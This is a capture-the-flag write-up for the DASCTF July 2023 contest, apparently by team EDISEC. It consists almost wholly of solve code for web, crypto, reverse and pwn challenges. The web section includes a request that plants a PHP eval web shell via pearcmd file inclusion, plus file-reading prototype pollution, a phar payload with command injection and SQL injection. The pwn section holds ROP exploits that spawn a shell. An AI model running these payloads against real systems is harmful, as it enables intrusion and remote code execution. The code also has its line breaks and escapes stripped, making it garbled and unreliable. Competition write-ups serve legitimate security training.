DASCTF 2023七月赛-WriteUp By EDISEC

POST /register HTTP/1.1Host: fb37c273-244d-43e4-8366-d915a7a5a84a.node4.buuoj.cn:81User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/jsonContent-Length: 145
{"username":"f","password":"f","u005fu005fu0069u006eu0069u0074u005fu005f":{"__globals__":{"__file__":"/sys/class/net/eth0/address"}}}

{"username":"su","password":"su","u005fu005fu0069u006eu0069u0074u005fu005f":{"__globals__":{"__file__":"/proc/self/cgroup"}}}

docker-dd0b25f3d46cf1a527e51b81aa90d16a01e0f2032fd1212688e6a5573a841b82.scope

import hashlibfrom itertools import chain

probably_public_bits = [    'root',  # username    'flask.app',  # modname    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))    '/usr/local/lib/python3.10/site-packages/flask/app.py'  # getattr(mod, '__file__', None),]

# This information is here to make it harder for an attacker to# guess the cookie name.  They are unlikely to be contained anywhere# within the unauthenticated debug page.private_bits = [    '112772796131818',  # str(uuid.getnode()),  /sys/class/net/ens33/address    # Machine Id: /etc/machine-id + /proc/sys/kernel/random/boot_id + /proc/self/cgroup    #'96cec10d3d9307792745ec3b85c89620 867ab5d2-4e57-4335-811b-2943c662e936 dd0b25f3d46cf1a527e51b81aa90d16a01e0f2032fd1212688e6a5573a841b82'    '96cec10d3d9307792745ec3b85c89620docker-dd0b25f3d46cf1a527e51b81aa90d16a01e0f2032fd1212688e6a5573a841b82.scope']

h = hashlib.sha1()for bit in chain(probably_public_bits, private_bits):    if not bit:        continue    if isinstance(bit, str):        bit = bit.encode("utf-8")    h.update(bit)h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# If we need to generate a pin we salt it a bit more so that we don't# end up with the same value and generate out 9 digitsnum = Noneif num is None:    h.update(b"pinsalt")    num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if# we don't have a result yet.rv = Noneif rv is None:    for group_size in 5, 4, 3:        if len(num) % group_size == 0:            rv = "-".join(                num[x: x + group_size].rjust(group_size, "0")                for x in range(0, len(num), group_size)            )            break    else:        rv = num

print(rv)

GET /admin/?+config-create+/&r=../../../../../../../../usr/share/php/pearcmd&/<?=@eval($_POST['1']);?>+../../../../../../../../../../tmp/hello.php HTTP/1.1Host: 1f0a6411-b816-458b-8117-9a64526a4a52.node4.buuoj.cnCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: user=adminConnection: closeContent-Length: 2

@unlink("phar.phar");$phar = new Phar("phar.phar"); //后缀名必须为phar$phar->startBuffering();$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub$o = new FILE(";cat /adjaskdhnask_flag_is_here_dakjdnmsakjnfksd");// $o->data='hello L1n!';$phar->setMetadata($o); //将自定义的meta-data存入manifest$phar->addFromString("test.txt", "test"); //添加要压缩的文件//签名自动计算$phar->stopBuffering();copy("phar.phar","1.jpg");

import requests
proxy = {    "http":"http://127.0.0.1:8080"}burp0_url = "http://8ea14a59-3600-4799-a424-95e815a3d71f.node4.buuoj.cn:81/?"burp0_cookies = {"PHPSESSID": "su"}
files = {    'file': ('1.jpg', open('1.jpg', 'rb'), 'image/jpeg')}
data = {    'username': "x' or 1=1 or '='",    'password': '1',    'submit': '登录'}# res = requests.post(burp0_url,              cookies=burp0_cookies,files=files, data=data,proxies=proxy)# print(res.text)burp0_url = "http://8ea14a59-3600-4799-a424-95e815a3d71f.node4.buuoj.cn:81/?file=phar:///var/www/html/1.jpg&todo=md5"res = requests.post(burp0_url,              cookies=burp0_cookies,data=data,proxies=proxy)print(res.text)

from Crypto.Util.number import *from Crypto.Cipher import AESfrom hashlib import sha256
# while True:#     t=1#     l=[]#     while t.nbits()<2048:#             a=random_prime(100000)#             t*=a#             l.append(a)#             if t.nbits()>1024 and isPrime(t+1) and len(l)==len(set(l)):#                 print(t+1)#                 print(l)#                 exit()
p=1646039467760809921384417881318197632339729798701743316871779850730124088235436739037968289129536052168492084895137755114367779627845101342493451953829768631969601283780866295185242377063883325908871505866245527390990448629751692756531170637001687312940503576522908824526727196004536948265796604296543889852653977581742290591503310677269244004712431403524841511882076378232121815100575905435360285461024033876106466429972220277383625270372343065189430613366863680114944949036697714384255267285185566915513090670999430637460297692866855976927251556192893170864723023555645173635269957891801939111l=[13649, 40093, 95083, 21871, 67157, 92177, 85447, 86753, 16831, 32783, 36559, 6857, 1993, 36947, 58937, 64123, 4547, 58913, 23117, 35081, 95561, 96643, 3041, 57859, 44417, 9601, 63397, 40387, 43969, 80777, 88919, 70207, 52631, 59393, 78193, 5507, 41381, 23971, 11093, 33809, 68891, 25343, 22343, 26713, 30269, 10301, 76649, 48449, 6277, 56843, 34313, 44917, 80273, 47189, 48281, 88853, 51907, 70951, 27427, 73607, 6949, 51581, 46747, 50111, 21751, 35509, 11689, 57943, 59077, 4729, 80191, 16729, 38923, 82471, 82241, 95261, 9833, 15907, 3203, 64237, 36901, 45131, 17599, 60649, 68141, 85297, 77471, 56237, 99277, 53633, 64439, 5, 13757, 34913, 86531, 21433, 31337, 48883, 36791, 45659, 87701, 4721, 73127, 51047, 17021, 61357, 80629, 19793, 23957, 28813, 12659, 98947, 49279, 14843, 13567, 26497, 69767, 56929, 73681, 19087, 31477, 2, 9623, 28949, 15107, 8171, 61879, 3137, 3373, 78787, 48527, 81013, 70481]ac=447927943942152454373915579633463093296672216442472107978411572732990249215109985995113994575122785857839865905380229440505412692175644056707487916149314099842537281325961844427878624082469925688698136348085846648819514068506888458337222398821510017492830740239598664872954200404967440361730590362895433016481048430556627764219294182844797733360938122131955776020485985511681423911906788781129508019991619460137558083441524973560987014362069247739505273471535172287834587124251838304726354056688492724602512939362242822011341577190328891585810979110884044413058535867407607042061558588577607813bc=1215701116638513048956192334013574363292697982329500270672223365449322285343258357856140021209541841105536023240347182450820348160903285459249603862534732957814200870654727545068158938148096897066999286101391138578843914723741106474935318173212665797672002768593273126060886749681910158923569198408587556456244201184768549856251812639668308787670614535869058553159333984053247475656175245944990166412146860426158176905181769939395344930496657103472683690245076083140489841761198977242719988769394183942705563073031538387891598159832495761710192522129290024704367592318316401954732048127878097176enc=b'xed)Xx99xb4Px00x8cjx06Uxe1xe6Ixb3Wx94xb0xb7jxe5x1axcd0x93x84x12xd7Dx0cxf9x05x8a^x89Exb1xe43dYx9exe6xd7cWx9cx89'n=p-1t=[]F=GF(p)
from sage.groups.generic import bsgsfor i in l:    a=pow(ac,n//i,p)    r=bsgs(F(pow(2,n//i,p)),F(a),(0,i))    t.append(ZZ(r))
alice=CRT(t,l)key = sha256(long_to_bytes(ZZ(pow(bc, alice, p)))).digest()iv = b"dasctfdasctfdasc"aes = AES.new(key, AES.MODE_CBC, iv)m = aes.decrypt(enc)print(m)

from Crypto.Util.number import *
N,gift,nN=75000029602085996700582008490482326525611947919932949726582734167668021800854674616074297109962078048435714672088452939300776268788888016125632084529419230038436738761550906906671010312930801751000022200360857089338231002088730471277277319253053479367509575754258003761447489654232217266317081318035524086377, 8006730615575401350470175601463518481685396114003290299131469001242636369747855817476589805833427855228149768949773065563676033514362512835553274555294034, 14183763184495367653522884147951054630177015952745593358354098952173965560488104213517563098676028516541915855754066719475487503348914181674929072472238449853082118064823835322313680705889432313419976738694317594843046001448855575986413338142129464525633835911168202553914150009081557835620953018542067857943s,f=69307306970629523181683439240748426263979206546157895088924929426911355406769672385984829784804673821643976780928024209092360092670457978154309402591145689825571209515868435608753923870043647892816574684663993415796465074027369407799009929334083395577490711236614662941070610575313972839165233651342137645009, 46997465834324781573963709865566777091686340553483507705539161842460528999282057880362259416654012854237739527277448599755805614622531827257136959664035098209206110290879482726083191005164961200125296999449598766201435057091624225218351537278712880859703730566080874333989361396420522357001928540408351500991e = 11
def gcd(g1, g2):    while g2:        g1, g2 = g2, g1 % g2    return g1.monic()
P=(gift>>(512-16))<<(512-16)Q=N//Pfor i in range(33):    P=gift^^(Q>>16)    Q=N//Passert isPrime(P) and isPrime(Q)d=inverse(e,(P-1)*(Q-1))n=pow(nN,d,N)n=ZZ(n)n+=N
PRx.<x> = PolynomialRing(Zmod(n))g1=x^e - sfor t in range(11,128):    m=(bytes_to_long(b"dasctf{")<<(t*8+8)) + x*2^8 + bytes_to_long(b"}")    g2=m^e-f    if gcd(g1, g2)[0]==1:        continue    rr=ZZ(-gcd(g1, g2)[0])    print(long_to_bytes(rr))

// xor 0x401// Add i*i// xor i * (i + 1)// minus + multiply// substitute
#include <stdio.h>
int main(){    int v3[40];    v3[0] = 3279;    v3[1] = 3264;    v3[2] = 3324;    v3[3] = 3288;    v3[4] = 3363;    v3[5] = 3345;    v3[6] = 3528;    v3[7] = 3453;    v3[8] = 3498;    v3[9] = 3627;    v3[10] = 3708;    v3[11] = 3675;    v3[12] = 3753;    v3[13] = 3786;    v3[14] = 3930;    v3[15] = 3930;    v3[16] = 4017;    v3[17] = 4173;    v3[18] = 4245;    v3[19] = 4476;    v3[20] = 4989;    v3[21] = 4851;    v3[22] = 5166;    v3[23] = 5148;    v3[24] = 4659;    v3[25] = 4743;    v3[26] = 4596;    v3[27] = 5976;    v3[28] = 5217;    v3[29] = 4650;    v3[30] = 6018;    v3[31] = 6135;    v3[32] = 6417;    v3[33] = 6477;    v3[34] = 6672;    v3[35] = 6891;    v3[36] = 7056;    v3[37] = 7398;    v3[38] = 7650;    v3[39] = 7890;
    for (int i = 0; i < 20; i += 2)    {        v3[10 + i] ^= v3[10 + i + 1];        v3[10 + i + 1] ^= v3[10 + i];        v3[10 + i] ^= v3[10 + i + 1];    }    for (int i = 0; i < 40; ++i)    {        v3[i] /= 3;        v3[i] += i;    }    for (int i = 0; i < 20; ++i)    {        v3[10 + i] ^= i * (i + 1);    }    for (int i = 0; i < 40; ++i)    {        v3[i] -= i * i;    }    for (int i = 0; i < 40; i++)    {        v3[i] ^= 0x401;        printf("%x", v3[i]);    }

    return 0;}

from z3 import *key =[  0x17,  0x0D,  0x04, 0x30,  0x29,    0x29,  0x2A,  0x21, 0x1E,  0x03,    0x45,  0x01,  0x0D, 0x2D,  0x29,    0x40,  0x08,  0x50, 0x0F,  0x2A,    0x38,  0x13,  0x3E, 0x46,  0x17,    0x3F,  0x1E,  0x44, 0x11,  0x38,    0x5C,  0x0C,  0x10, 0x40,  0x1F,    0x03,  0x11,  0x47, 0x3A,  0x09,    0x40,  0x53,  0x47, 0x34,  0x63,    0x59,  0x4C,  0x44, 0x01,  0x63,    0x10,  0x10,  0x34, 0x2B,   0x00,   0x2C,  0x32,  0x20, 0x32,  0x1F,    0x14,  0x3F,  0x02, 0x63,   0x00,   0x39,  0x4F,  0x2B, 0x47,  0x13,    0x50,  0x5C,  0x5D, 0x3A,  0x54,    0x4A,  0x51,  0x2D, 0x37,  0x15,    0x01,  0x63,  0x1E, 0x1C,  0x38,    0x01,  0x0C,  0x4D, 0x5C,  0x04,    0x25,  0x43,  0x3C, 0x36,  0x33,    0x4F,  0x26,  0x57, 0x30,  0x10,]
v16 = [i for i in range(40)]v16[0] = 33211;v16[1] = 36113;v16[2] = 28786;v16[3] = 44634;v16[4] = 30174;v16[5] = 39163;v16[6] = 34923;v16[7] = 44333;v16[8] = 33574;v16[9] = 23555;v16[10] = 35015;v16[11] = 42724;v16[12] = 34160;v16[13] = 49166;v16[14] = 35770;v16[15] = 45984;v16[16] = 39754;v16[17] = 51672;v16[18] = 38323;v16[19] = 27511;v16[20] = 31334;v16[21] = 34214;v16[22] = 28014;v16[23] = 41090;v16[24] = 29258;v16[25] = 37905;v16[26] = 33777;v16[27] = 39812;v16[28] = 29442;v16[29] = 22225;v16[30] = 30853;v16[31] = 35330;v16[32] = 30393;v16[33] = 41247;v16[34] = 30439;v16[35] = 39434;v16[36] = 31587;v16[37] = 46815;v16[38] = 35205;v16[39] = 20689;
a, b, c, d, e, f, g, h, x, y = Ints('a b c d e f g h x y')
# 初始化求解器s = Solver()# 为每个m值从0到9创建方程，并添加到求解器中
for m in range(10):    s.add(v16[10 * 3 + m] -  a * key[m] - b * key[10 + m]  - c * key[20 + m] - d * key[30 + m] - e * key[m + 40] - f * key[m + 50] - g * key[m + 60] - h * key[m + 70] - x * key[m + 80] - y * key[m + 90] == 0)
# 求解方程if s.check() == sat:    m = s.model()    print(m[a],m[b],m[c],m[d],m[e],m[f],m[g],m[h],m[x],m[y],end=' ')else:    print("No solution found")

from pwn import *#from LibcSearcher import *context(os='linux', arch='amd64', log_level='debug')#context(os='linux', arch='amd64')#context.terminal = ['tmux','splitw','-h']filename = './pwn2'debug = 0ip = 'node4.buuoj.cn'port = 27432so = ELF('/home/roach/glibc-patcher/libs/amd64/2.31-0ubuntu9.9_amd64/libc.so.6')
if debug:    p = process(filename)else:    p  = remote(ip,port)
ru      = lambda a:     p.recvuntil(a)r       = lambda n:     p.recv(n)sla     = lambda a,b:   p.sendlineafter(a,b)sa      = lambda a,b:   p.sendafter(a,b)sl      = lambda a:     p.sendline(a)s       = lambda a:     p.send(a)
def inter() : p.interactive()def debu(cmd=''):    gdb.attach(p,cmd)    pause()def get_addr():     return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))def get_sysbin(libc_base,libc):     return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))def csu(rdi, rsi, rdx, rip, gadget) :     return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)

def open():    sla(b'> choose:',b'1')
def show():    sla(b'> choose:',b'2')
def insert(n,m,content,flag=1):    sla(b'> choose:',b'3')    sla(b'n m:',str(n).encode())    sl(str(m).encode())    ru(b'sequence:')    for i in range(m):        if flag:            sl(content[i])        else:            s(content[i])
def delete(n,m):    sla(b'> choose:',b'4')    sla(b'(n):',str(n).encode())    sl(str(m).encode())
def editor(n,content):    sla(b'> choose:',b'6')    sla(b'modified:',str(n).encode())    sla(b'content:',content)
def find_string(strings,num):    sla(b'> choose:',b'7')    sla(b'for:',strings)    for i in range(num):        sla(b'(y/n)',b'y')
def replace_strings(search,replace,num):    sla(b'> choose:',b'8')    sla(b'for:',search)    sa(b'with:',replace[0])    for i in range(num):        sla(b'(y/n)n',b'y')        sla(b'(y/n)n',b'y')        sla(b'with:',replace[i+1])        sla(b'(y/n)n',b'y')

open()content = [b'abcd']insert(1,1,content)rep_content = [b'efgh'*26+b'p',b'efgh'*26]replace_strings(b'abcd',rep_content,1)show()ru(b'p')canary = u64(b'x00'+r(7))rbp = u64(r(6).ljust(8, b'x00'))print("canary :",hex(canary))print("rbp    :",hex(rbp))editor(1,b'efgh'+b'x00'*(180-4))
content2 = [b'abcd'*26+b'x00x01'+b'ab'*6+b'qp'+b'xff',            b'abcd'*26+p64(canary)+p64(rbp)+b'xff']insert(1,2,content2)show()#debu('b *$rebase(0x2159)')find_string(b'abcd',2)editor(1,b'abcd'*26+b'ab')show()ru(b'qp')aslr = u64(r(6).ljust(8, b'x00'))-0x152Bprint("aslr   :",hex(aslr))editor(1,b'efgh'+b'x00'*(180-4))editor(2,b'efgh'+b'x00'*(180-4))show()
pop_rdi = aslr+0x2ac3printf_got = aslr+0x4F70puts_plt = aslr+0x11C0content3 = [b'abcd'*26+p64(canary)+p64(rbp)+p64(pop_rdi)+p64(printf_got)+p64(puts_plt)+p64(aslr+0x13c9)+b'xff']insert(1,1,content3)find_string(b'abcd',1)ru(b'foundx0a')libc = u64(r(6).ljust(8, b'x00'))-so.sym['printf']print("libc   :",hex(libc))editor(1,b'efgh'+b'x00'*(180-4))show()content4 = [b'mnwe'*26+p64(canary)+p64(rbp)+p64(pop_rdi)+p64(libc+0x1b45bd)+p64(aslr+0x101a)+p64(libc+0x052290)+b'xff']insert(1,1,content4)#debu('b *$rebase(0x2159)')find_string(b'mnwe',1)inter()

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./viphouse'#context.arch='amd64'while True :  # try :    elf=ELF(elfelf)    context.arch=elf.arch
    gdb_text='''      telescope $rebase(0x202040) 16      '''
    if len(sys.argv)==1 :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=process(elfelf)      gdb_open=1      # io=process(['./'],env={'LD_PRELOAD':'./'})      clibc.srand(clibc.time(0))      libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=remote('124.223.159.125',9999)      gdb_open=0      clibc.srand(clibc.time(0))      libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    def gdb_attach(io,a):      if gdb_open==1 :        gdb.attach(io,a)
    def choice(a):      io.sendlineafter('Choose an option: ',str(a))
    def login(a,b):      choice(1)      io.sendlineafter(': ',a)      io.sendlineafter(': ',b)      def edit(a,b):      choice(2)      io.sendlineafter('Index:',str(a))      io.sendafter('content:',b)
    def show(a):      choice(3)      io.sendlineafter('Index:',str(a))
    def chk():      choice(4)      io.sendlineafter('guess: n','x00'*8)
    def logout():      choice(5)
    def add(a):      io.sendlineafter('Choice: ','1')      io.sendlineafter('note: ',a)

    login('adminx00','rootx00')    choice(3)    add(p64(elf.got['read']))    io.sendlineafter('Choice: ','3')

    chk()    data=io.recv(10)    if 'Wrong' in data:      io.close()      continue
    io.recvuntil('gift!')    canary=int(io.recvuntil('n',drop=True),16)
    logout()    pay='rootx00'.ljust(0x40,'x00')+p64(canary)+p64(0x404c00)+p64(0x401CB6)+p64(elf.plt['puts'])+p64(0x401B18)    choice(1)    io.sendlineafter(': ','a')    io.sendafter(': ',pay)
    libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['read']    libc.address=libc_base    bin_sh_addr=libc.search('/bin/shx00').next()    system_addr=libc.sym['system']    free_hook_addr=libc.sym['__free_hook']    pop_rax_ret=libc.search(asm('pop rax;ret')).next()    pop_rdi_ret=libc.search(asm('pop rdi;ret')).next()    pop_rsi_ret=libc.search(asm('pop rsi;ret')).next()    pop_rdx_ret=libc.search(asm('pop rdx;ret')).next()    syscall_ret=libc.search(asm('syscall;ret')).next()

    choice(3)    io.sendlineafter('Choice: ','2')    add(p64(bin_sh_addr))    io.sendlineafter('Choice: ','3')    logout()    choice(1)    pay='rootx00'.ljust(0x40,'x00')+p64(canary)+p64(0x404c00)+p64(0x401CB6)+p64(system_addr)+'n'    io.sendlineafter(': ','a')
    gdb_attach(io,gdb_text)    sleep(0.2)    io.sendafter(': ',pay)            success('libc_base:'+hex(libc_base))    # success('heap_base:'+hex(heap_base))
        io.interactive()
  # except Exception as e:  #   io.close()  #   continue  # else:  #   continue